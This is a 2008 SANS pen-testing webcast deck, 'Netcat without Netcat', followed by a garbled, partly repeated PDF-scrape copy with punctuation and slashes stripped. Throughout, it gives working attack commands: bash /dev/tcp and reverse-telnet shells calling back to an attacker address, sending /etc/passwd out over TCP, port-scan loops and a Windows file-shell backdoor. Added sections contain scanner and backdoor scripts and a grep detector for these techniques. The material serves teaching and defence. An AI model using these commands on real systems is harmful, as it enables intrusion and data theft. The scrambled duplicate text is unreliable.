• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows
Linux: /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu, whose bash packages were built without this feature at the time of this webcast), the built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a TCP connection to the target IPaddr on that port
  – /dev/tcp is not a file in the filesystem: bash interprets the path itself, so it works only in bash (not in /bin/sh or dash) and only in bash builds compiled with network redirection enabled; current Debian and Ubuntu bash packages do enable it
• With a little command-line magic we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener whose Standard Out is redirected into a file
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse-shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
  – The order matters: Standard Out is pointed at the socket first, then Standard In (0<&1) and Standard Error (2>&1) are duplicated from it, so all three share the one connection
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered
[Figure: the protected server sits behind a firewall that blocks incoming connections and runs /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1; the attacker runs nc -l -p [p] and types commands there, which are executed on the protected server]
Linux Command-Line Reverse Shell Backdoor In Action
[Screenshot of the /dev/tcp reverse shell connecting to the attacker's Netcat listener]
Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on the echo command's Standard Output or Standard Error
  – The shell itself prints the message while it sets up the redirection, before the command runs, so a 2>/dev/null on the echo does not catch it and we cannot redirect it to a file that way
  – It can be silenced or captured by running the probe in a subshell, or via bash -c, and redirecting that shell's Standard Error instead
[Screenshot: probing port 80 returns silently; the callout reads "Port 80 is listening"]
Storing Results and Iterating
• But it does set the exit status variable $? to 0 if the port is open, 1 if it is closed
• For a port scanner we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? -eq 0 ] && echo "$port is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
• Caveat: a port that a firewall silently filters never refuses the connection, so each such probe blocks until the kernel's TCP connect timeout expires; scanning a filtered host this way is slow unless each probe is bounded
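A fuller version of the /dev/tcp scanner, added here as an example and not part of the original slides. It keeps the slide's append-as-you-go output file but bounds each probe with timeout(1) so filtered ports do not stall the loop, and it discards the shell's own "Connection refused" text by running the redirection in a child bash and redirecting that child's Standard Error. The function names, the two-second default wait, and the use of exec 3<> (which completes the TCP handshake without sending a byte) are this example's choices; [IPaddr] is whatever target you pass in.

```shell
#!/bin/sh
# Added example, not from the original slides. POSIX sh wrapper around bash's
# /dev/tcp redirection; every name below is this example's own.

# probe_port HOST PORT [SECONDS]
#   Exit 0 if a TCP connect to HOST:PORT succeeds, non-zero if it is refused,
#   unreachable, or does not answer within SECONDS (default 2).
#   The redirection runs in a child bash because /dev/tcp is a bash feature,
#   and because the "Connection refused" message is printed by that shell
#   while it sets up the redirect: redirecting the child's stderr silences it.
probe_port() {
    host=$1; port=$2; secs=${3:-2}
    if command -v timeout >/dev/null 2>&1; then
        # timeout(1) kills the probe if a filtered port swallows the SYN
        timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    else
        bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
    fi
}

# scan_ports HOST FIRST LAST OUTFILE
#   Probes FIRST..LAST, appending "PORT is open" to OUTFILE as each open port
#   is found (so OUTFILE can be tailed mid-scan, as on the slide), and prints
#   the open ports space-separated on stdout. Returns 0 even if none are open.
#   Usage: scan_ports 10.1.1.9 1 1023 /tmp/ports.txt
scan_ports() {
    host=$1; first=$2; last=$3; out=$4
    open=""
    port=$first
    while [ "$port" -le "$last" ]; do
        if probe_port "$host" "$port"; then
            echo "$port is open" >> "$out"
            open="$open $port"
        fi
        port=$((port + 1))
    done
    echo "${open# }"
    return 0
}
```

Because probe_port only reports the exit status, the scanner stays quiet on the target's terminal, and the results file can be watched with tail -f from a second session while the loop runs.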
Command-Line Port Scanner In Action
[Screenshot of the while loop scanning a target; the callout reads "5 Not Closed"]
Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get a remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1 (a listener waiting there)
• Receive output on the attacker's machine on port2 (a second listener)
  – Note that only Standard Out of the shell goes through the second telnet; its Standard Error stays on the target's terminal unless it is redirected into the pipe as well
Reverse Telnet Shell in Action
[Screenshot of the two-telnet reverse shell with commands entered on port1 and output arriving on port2]
Windows
• The built-in command line has very clunky syntax
• Also, the telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work... we won't go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address:
  – Watch it... When it stops, hit CTRL-] (the telnet client's escape character) and then type quit to resume
  – Or kill the telnet client every 5 seconds from a second window:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the client-side logging option of the Windows telnet client (-f [filename]; -l is the login name, not the log file) overwrites all earlier logs... No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line... only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action
[Screenshot of type [filename] > \\[machine]\[share]\[filename] copying a file across the network]
Backdoors: The File Shell
• Now let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
  C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
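The same building block ported to a POSIX shell, added here as an example so the poll-run-delete cycle of the file shell can be run end to end; it is not code from the original slides, whose version is the cmd.exe one-liner above. The directory layout, the file names, the use of sh -c as the command runner, and the operator-side helper are this example's choices.

```shell
#!/bin/sh
# Added example, not from the original slides: the Windows file shell from the
# slide above, ported to POSIX sh. Directory, file names and sh -c are this
# example's choices; the slide uses cmd.exe /c, commands.txt and output.txt
# on a network share.

# file_shell_once DIR
#   One poll: if DIR/commands.txt exists, run each of its lines through sh -c,
#   append a "$ command" banner plus the command's stdout and stderr to
#   DIR/output.txt, then delete commands.txt so nothing runs twice.
#   Returns 0 if a command file was processed, 1 if there was nothing to do.
file_shell_once() {
    dir=$1
    cmdfile="$dir/commands.txt"
    outfile="$dir/output.txt"
    [ -f "$cmdfile" ] || return 1
    # IFS cleared and -r: take the whole line, like the slide's "delims=^",
    # so spaces, pipes and redirections inside a command survive.
    while IFS= read -r line || [ -n "$line" ]; do
        [ -n "$line" ] || continue
        echo "\$ $line" >> "$outfile"
        sh -c "$line" >> "$outfile" 2>&1 </dev/null
    done < "$cmdfile"
    rm -f "$cmdfile"
    return 0
}

# file_shell_loop DIR [SECONDS]
#   The spinning loop from the slide: poll forever, sleeping between polls
#   (the slide's loop uses ping -n 2 127.0.0.1 as a roughly one-second sleep).
file_shell_loop() {
    dir=$1; delay=${2:-2}
    while :; do
        file_shell_once "$dir" || true
        sleep "$delay"
    done
}

# run_via_file_shell DIR COMMAND
#   The operator's side of the exchange: drop COMMAND into commands.txt, let
#   one poll pick it up, and print everything captured in output.txt.
run_via_file_shell() {
    dir=$1; cmd=$2
    printf '%s\n' "$cmd" > "$dir/commands.txt"
    file_shell_once "$dir"
    cat "$dir/output.txt"
}
```

The one design point worth noticing is the deletion of commands.txt after each poll: without it the same command would run on every iteration of the loop, which is also why the slide's FOR /L body deletes the file.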
The File Shell In Action
[Screenshot of the file shell loop picking up commands.txt and writing output.txt]
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
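For the defender's side of the conclusion above, here is an added example (not from the original webcast) of what "interpreting attackers' actions" looks like in practice: a grep-based check that flags process command lines using the Netcat-without-Netcat tricks covered in this deck. The log lines are constructed for this example, and their layout (timestamp, host, then the process command line, as you might export from auditd EXECVE records or Windows 4688/Sysmon process-creation events) is an assumption, not any product's format; the pattern list and function names are likewise this example's own.

```shell
#!/bin/sh
# Added example, not from the original slides: a defender-side check for the
# Netcat-without-Netcat techniques in this webcast. Log layout is assumed;
# the hosts and addresses in the sample are invented.

# One extended regex per technique, newline separated (grep treats each line
# of the -e argument as its own pattern):
#   /dev/tcp/                      bash network redirection (transfer, scan, reverse shell)
#   telnet ... | ... bash/sh       "reverse telnet" piping a telnet client into a shell
#   bash -i ... N<&N               the interactive reverse-shell fd shuffle
#   for /L ... telnet | ftp -s:    Windows telnet/ftp-client port scanners
#   for /f ... cmd.exe /c ... >>   the Windows file shell
NWN_PATTERNS='/dev/tcp/
telnet [^|]*[|][^|]*(ba)?sh
bash -i .*[0-9]<&[0-9]
for /[Ll] .*(telnet|ftp -s:)
for /[Ff] .*cmd\.exe /c .*>>'

# flag_netcat_without_netcat: reads log lines on stdin, prints the ones whose
# command line matches any pattern above (case-sensitive; tune to your logs).
flag_netcat_without_netcat() {
    grep -E -e "$NWN_PATTERNS"
}

# count_flagged: number of flagged lines on stdin (prints 0 if none).
count_flagged() {
    flag_netcat_without_netcat | grep -c .
}

# sample_log: constructed process-creation records for this example.
sample_log() {
    cat <<'EOF'
2008-06-10T14:02:11 web01 /bin/bash -i > /dev/tcp/10.1.1.5/443 0<&1 2>&1
2008-06-10T14:02:40 web01 cat /etc/passwd > /dev/tcp/10.1.1.5/8080
2008-06-10T14:03:05 db01 telnet 10.1.1.5 4444 | /bin/bash | telnet 10.1.1.5 4445
2008-06-10T14:03:30 db01 /usr/bin/find / -name core -delete
2008-06-10T14:04:00 ws17 cmd.exe /c for /L %i in (1,1,1024) do echo open 10.1.2.9 %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
2008-06-10T14:04:20 ws17 cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
2008-06-10T14:05:00 ws17 ping -n 4 10.1.2.9
2008-06-10T14:05:30 web01 /usr/bin/ssh admin@10.1.1.20
EOF
}
```

Run it as `sample_log | flag_netcat_without_netcat` to see the five matching records; the find, ping and ssh lines are there to show that ordinary administration is left alone. Command-line logging is the prerequisite: none of these techniques opens a listening port or drops a binary, so the command line is the artifact that survives.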
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Page 15
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 16
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
Slide 19: Linux Command-Line Port Scanner
• To see if a single port is open, we could run:
    $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file
[Screenshot caption: Port 80 is listening]
Slide 20: Storing Results and Iterating
• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
    $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
Slide 21: Command-Line Port Scanner In Action
[Screenshot annotation: 5 Not Closed]
Slide 22: Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get a remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
    $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2
